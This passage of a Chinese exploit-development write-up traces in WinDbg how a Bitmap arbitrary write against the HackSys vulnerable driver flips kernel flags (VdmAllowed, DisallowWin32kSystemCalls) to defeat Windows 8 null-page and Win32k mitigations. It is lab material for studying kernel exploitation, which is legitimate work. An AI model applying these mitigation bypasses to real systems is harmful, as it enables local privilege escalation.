  14.     v12 = (unsigned int)*v9; //BaseAddress连续传递 
  15.     v74 = v12;//再次传递 
  16.     if ( v74 < 0x10000 && !(*(_DWORD *)(v14 + 196) & 0x1000000) )// 判断v74 BaseAddress是否小于10000,如果小于会认为是零页内存分配,则会判断v14+196,也就是Flags.VdmAllowed是否允许分配 
  17.     { 
  18.        v25 = 0xC00000F0;//如果是零页分配且禁用零页分配,则返回C00000F0 
  19.        goto LABEL_145; 
  20.     } 

我们尝试使用Bitmap来修改VdmAllowed看看能不能进行零页分配,继续执行到达我们setbitmap的地方。

  1. kd> g 
  2. Break instruction exception - code 80000003 (first chance) 
  3. 001b:00021d21 cc              int     3 
  4. kd> dt nt!_EPROCESS VdmAllowed 85a44040 
  5.    +0x0c4 VdmAllowed : 0y1 

可以看到VdmAllowed被改掉了,进入刚才的判断

  1. kd> g 
  2. Breakpoint 1 hit 
  3. nt!NtAllocateVirtualMemory+0x9b7://判断edx小于1000 
  4. 81a89b25 3bd0            cmp     edx,eax 
  5. kd> r edx 
  6. edx=00000060 
  7. kd> p 
  8. nt!NtAllocateVirtualMemory+0x9b9: 
  9. 81a89b27 0f8257781200    jb      nt! ?? ::NNGAKEGL::`string'+0x19d1a (81bb1384) 
  10. kd> p//判断VdmAllowed为1,允许零页申请 
  11. nt! ?? ::NNGAKEGL::`string'+0x19d1a: 
  12. 81bb1384 f787c400000000000001 test dword ptr [edi+0C4h],1000000h 
  13. kd> p 
  14. nt! ?? ::NNGAKEGL::`string'+0x19d24: 
  15. 81bb138e 0f859987edff    jne     nt!NtAllocateVirtualMemory+0x9bf (81a89b2d) 
  16. kd> p 
  17. nt!NtAllocateVirtualMemory+0x9bf://跳转到正常流程,而不返回C0000F0 
  18. 81a89b2d 8bc6            mov     eax,esi 

可以看到,绕过了刚才的判断,接下来直接执行,可以看到,NtAllocateVirtualMemory返回了STATUS_SUCCESS(图)

http://p1.qhimg.com/t01b89afbe9d2ba5930.png

回归Win8看防护之Win32k.sys

下面我们来看一下Win32k的API禁用的情况,当然这里默认Disallow的比特位也是为0,也就是在当前进程不禁用Win32k系统调用,在PsConvertToGuiThread函数中。

  1. kd> p 
  2. nt!PsConvertToGuiThread+0x9://获得KTHREAD结构 
  3. 81b0c67f 648b3524010000  mov     esi,dword ptr fs:[124h] 
  4. kd> r esi 
  5. esi=8548b040 
  6. kd> dt nt!_KTHREAD 8548b040 
  7.    +0x000 Header           : _DISPATCHER_HEADER 
  8.    +0x010 SListFaultAddress : (null) 
  9. kd> p 
  10. nt!PsConvertToGuiThread+0x2c://ecx获得EPROCESS结构 
  11. 81b0c6a2 8b8e80000000    mov     ecx,dword ptr [esi+80h] 
  12. kd> p 
  13. nt!PsConvertToGuiThread+0x32://对应Flags2的偏移 
  14. 81b0c6a8 f781c000000000000080 test dword ptr [ecx+0C0h],80000000h 
  15. kd> dt nt!_EPROCESS Flags2 8548b040+70 
  16.    +0x0c0 Flags2 : 0x1020201 
  17. kd> dt nt!_EPROCESS DisallowWin32kSystemCalls 
  18.    +0x0c0 DisallowWin32kSystemCalls : 0y0//判断Disallow比特位的值 

这里DisallowWin32kSystemCalls的比特位为0,也就是允许win32k调用,这里到达一处条件判断,判断的就是这个比特位,如果为1,则会跳转返回C0000005,当前状态为0,允许执行时,会继续执行。

  1. kd> p 
  2. nt!PsConvertToGuiThread+0x3c: 
  3. 81b0c6b2 757e            jne     nt!PsConvertToGuiThread+0xbc (81b0c732) 
  4. kd> p 
  5. nt!PsConvertToGuiThread+0x3e: 
  6. 81b0c6b4 8d55ff          lea     edx,[ebp-1] 

接下来,我们注释掉还原的setbitmap部分,重新执行,看到Disallow比特位为1,这时候程序会进入错误处理,返回C0000022

  1. kd> dt nt!_EPROCESS DisallowWin32kSystemCalls 866654c0 
  2.    +0x0c0 DisallowWin32kSystemCalls : 0y1//对应比特位为1 
  3. kd> p 
  4. nt!PsConvertToGuiThread+0x32: 
  5. 81b0c6a8 f781c000000000000080 test dword ptr [ecx+0C0h],80000000h 
  6. //判断Flags2.DisallowedWin32kSystemCalls 
  7. kd> p 
  8. nt!PsConvertToGuiThread+0x3c: 
  9. 81b0c6b2 757e            jne     nt!PsConvertToGuiThread+0xbc (81b0c732) 
  10. kd> p 
  11. nt!PsConvertToGuiThread+0xbc: 
  12. 81b0c732 b8220000c0      mov     eax,0C0000022h   //进入错误判断,返回C0000022 

来看下这段代码逻辑。

  1. signed int __stdcall PsConvertToGuiThread() 
  3.   v0 = __readfsdword(292);//获取_KTHREAD结构体 
  4.   if ( *(_BYTE *)(v0 + 346) )//判断_KTHREAD结构体的Previous Mode 
  5.   { 
  6.     if ( *(int **)(v0 + 60) == &KeServiceDescriptorTable )//检查是否是win32的线程 
  7.     { 
  8.       v1 = *(_DWORD *)(v0 + 128); 
  9.       if ( *(_DWORD *)(v1 + 192) & 0x80000000 )//判断DisallowedWin32kSystemCalls 
  10.       { 
  11.         result = 0xC000022;//返回C000022 STATUS_ACCESS_DENIED 
  12.       } 

整个Win32k的检查过程是这样的,KiFastCallEntry -> KiEndUnexpectRange -> PsCovertToGUIThread。这个检查过程的依据是SSDT,系统调度表,当调用不在SSDT表时,也就是第一次调用Win32k System Call的时候,会检查win32k是否允许调用。如下代码逻辑:

  1. .text:00511652 loc_511652:                             ; CODE XREF: _KiEndUnexpectedRange+15j 
  2. .text:00511652                                         ; _KiSystemService+8Aj 
  3. .text:00511652                 mov     edi, eax ;eax = SSDTIndex 
  4. .text:00511654                 shr     edi, 8;eax/256 
  5. .text:00511657                 and     edi, 10h;//SSDT or SSDTShadow 
  6. .text:0051165A                 mov     ecx, edi 
  7. .text:0051165C          add     edi, [esi+3Ch];//检查_KTHREAD->ServiceTable 
  8.                                 //kd> dt nt!_KTHREAD ServiceTable 
  9.                                 //+0x03c ServiceTable : Ptr32 Void 
  10. .text:0051165F                 mov     ebx, eax 
  11. .text:00511661                 and     eax, 0FFFh 
  12. .text:00511666                 cmp     eax, [edi+8];//检查当前系统调用号 
  13. //和ServiceTable中的调用号,确定是不是在SSDT 
  14. .text:00511669                 jnb     _KiEndUnexpectedRange//如果不在,则跳转 

在KiEndUnexpectedRange中会通过PsConvertToGuiThread来Check状态,在这里会检查win32k系统调用的情况,如果Flags2.DisAllowedWin32kSystemCalls为1,则禁用状态,返回C000022 ,也就是STATUS_ACCESS_DENIED

  1. .text:00511384 _KiEndUnexpectedRange proc near         ; CODE XREF: _KiSystemService+19B_x0019_j 
  2. .text:00511384                 cmp     ecx, 10h 
  3. .text:00511387                 jnz     short loc_5113C3 
  4. .text:00511389                 push    edx 
  5. .text:0051138A                 push    ebx//系统调用号 
  6. .text:0051138B            call _PsConvertToGuiThread@0 ; PsConvertToGuiThread() 

默认是不启用的,则能成功打开cmd。

[[185117]]

我们通过setbitmap可以将其改为启用,这样PsConvertToGuiThread就会返回C000022,则后续会造成调用CreateProcess中由于禁用win32k.sys导致程序加载失败。

其实整个HEVD的这个exploit调试还是很有趣的,Bitmap也可以修改kernel Address达到一些比较巧妙的效果,当然,如果修改的地址有问题,则会直接BSOD,我就多次发生这样的情况,快照保存了几十个。文中有一些疑问和思考不够深入的地方请师傅们多多批评指正,谢谢大家!

责任编辑:赵宁宁 来源: 安全客
内核漏洞Windows
相关推荐
验证Windows内核漏洞的框架
在内核级的漏洞(操作系统本身或者硬件驱动)中,有一项就是我们常说的’任意写(writewhatwhere)’[1]。为便于分析,很有必要写个基本的框架,对给定的’任意写(writewhatwhere)’漏洞进行封装,并验证其对操作系统的利用。要把任意的写操作转换为攻击利用,需要三个基本的步骤。

2014-06-09 09:19:10

Windows内核EPATHOBJ 0day漏洞
Windows内核EPATHOBJ0day漏洞是通过对PATHALLOC()进行内存压力测试爆出的,首先利用PATHREC指向相同的的用户空间PATHRECEPATHOBJ::bFlatten它会”自旋”进行无限链表遍历。

2013-05-23 10:48:14

EPATHOBJ 0d0day漏洞
Windows内核惊现高危漏洞 可绕过UAC
11月29日消息,据国外媒体报道,微软日前证实,他们正在调查一个关于Windows内核的0day漏洞。该漏洞属于权限提升漏洞,攻击者可利用该漏洞跳过微软UAC(用户帐户控制)安全功能。

2010-11-29 14:05:29

微软将发多个补丁 修补Windows 7内核漏洞
微软周五表示,正在调查存在于Windows内核中的一处漏洞,该漏洞是由安全研究人员最新发现的。今年,微软已经发布了13个Windows内核漏洞补丁。下周二,微软还将发布14个安全补丁,其中有10个是针对Windows操作系统。

2010-08-09 09:09:18

Windows内核畸形PE文件远程拒绝服务漏洞
影响版本:MicrosoftWindowsXPMicrosoftWindows2000MicrosoftWindows2003MicrosoftWindowsVistaSP1

2009-10-21 14:31:15

漏洞补丁
从MS16-098看Windows 8.1内核漏洞利用
本文主要讲的内容是找到一个目前还没有可用exploit的可利用漏洞的补丁,从它开始我的逆向工程以及利用的旅途。

2017-01-15 23:46:37

Windows内核图像文件漏洞揭示严重安全问题
泄漏敏感信息远程攻击立即处理[msg]微软终于填补了那8个安全漏洞,其中包括一个关键的安全漏洞,那就是Windows内核处理图像文件漏洞。

2009-03-18 10:55:50

Linux 内核 vs Windows 内核
对于服务器使用的操作系统基本上都是Linux,而且内核源码也是开源的,任何人都可以下载,并增加自己的改动或功能,Linux最大的魅力在于,全世界有非常多的技术大佬为它贡献代码。

2021-02-20 06:08:07

LinuxWindows内核
基于Windows 32k内核提权漏洞的攻防对抗
漏洞成功利用漏洞触发、漏洞利用这两大环节,而漏洞利用又有以下三个阶段,分别是堆喷射阶段、信息泄露阶段、代码执行阶段。下面将结合CVE20190808、CVE20211732进行详细阐述。

2023-09-11 06:59:59

48小时封闭开发 Windows Phone也玩儿心跳
2011年12月10日,微软在北京举办了WindowsPhone48小时应用开发挑战赛活动。活动首次将国外流行的CodeJam形式带入中国,即由微软提供开发的技能培训、开发环境和开发过程中的技术支持。

2011-12-11 19:50:50

CodeJamWindowsPhon移动应用开发
玩儿转Docker 镜像
由于众多新颖的特性以及项目本身的开放性,Docker在不到两年的时间里迅速获得诸多IT厂商的参与,其中更是包括Google、Microsoft、VMware等业界行业领导者。同时,Docker在开发者社区也是一石激起千层浪,许多如我之码农纷纷开始关注、学习和使用Docker,许多企业,尤其是互联网企业,也在不断加大对Docker的投入,大有掀起一场容器革命之势。

2014-12-15 09:16:10

DockerDaoCloud镜像部署
iOS 14被曝内核漏洞
iOS14已经发布了一段时间,除了一些bug之外并没有感觉到其他的不适,但是开发者却发现了iOS14的内核漏洞,这个漏洞可用于一些非法用途,也可以用于iPhone的越狱!

2020-10-12 09:43:41

iOS 14漏洞苹果
黑客研究苹果Safari浏览器竟发现Windows 7内核漏洞
近日,国外黑客竟利用苹果公司的Safari浏览器,意外发现了win7系统的内核漏洞!

2012-01-04 13:08:30

Netstat 还能这么玩儿
netstat这个命令在Linux、Windows和MacOS操作系统下都兼容,不同的是,netstat在UNIX下显示详细信息的命令是mannetstat,而在Linux和Windows下面是netstathelp。

2022-02-14 21:58:58

netstatLinuxWindows
ms08025内核漏洞深度分析
成功利用此漏洞的本地攻击者可以完全控制受影响的系统。攻击者可随后安装程序;查看、更改或删除数据;或者创建新帐户。这是用于Windows2000、WindowsXP、WindowsServer2003、WindowsVista和WindowsServer2008所有受支持版本的重要安全更新。

2010-09-15 09:24:55

DRAM芯片内核提权漏洞解析
安全研究人员发现在英特尔PC上的Linux系统中可以利用某些种类的DDRDRAM芯片所存在的物理缺陷来获取系统最高权限。该技术被称为“Rowhammer”,其可使最近一代的DRAM芯片多次访问内存导致相邻行发生“位翻转”,并允许任何人改变计算机内存中的存储内容。

2015-03-13 10:06:55

Linux内核 vs Windows内核,你就知道内核架构类型了
对于服务器使用的操作系统基本上都是Linux,而且内核源码也是开源的,任何人都可以下载,并增加自己的改动或功能,Linux最大的魅力在于,全世界有非常多的技术大佬为它贡献代码。

2021-02-25 09:50:01

LinuxWindows内核
探秘Windows内核落后于Linux内核的根源
日前,一位微软WindowsNT内核开发者承认,Windows内核与Linux内核之间的性能差距正日益拉大。他通过Tor(原因显而易见)在HackerNews上匿名发帖(已经自行删除),指出问题的根源不是技术方面而是社会性的。

2013-05-13 09:52:52

Windows内核Linux内核
2022年Linux内核提权漏洞总结
本篇文章我们总结2022年以来Linux内核出现的严重安全漏洞,以供大家参考学习和修复。

2022-03-10 09:41:15

漏洞Linux内核
Linux内核漏洞发现蓝牙相关漏洞, 或可被用作执行任意代码
一个在Linux内核中发现的新蓝牙缺陷引起了Google以及Intel两家科技巨头的注意,并且都相继发出了相关的安全警示。这个缺陷是在BlueZ软件堆栈中找到的,这个堆栈是用于在Linux上实现蓝牙核心协议的。

2020-10-19 14:01:34

漏洞Linux代码
点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服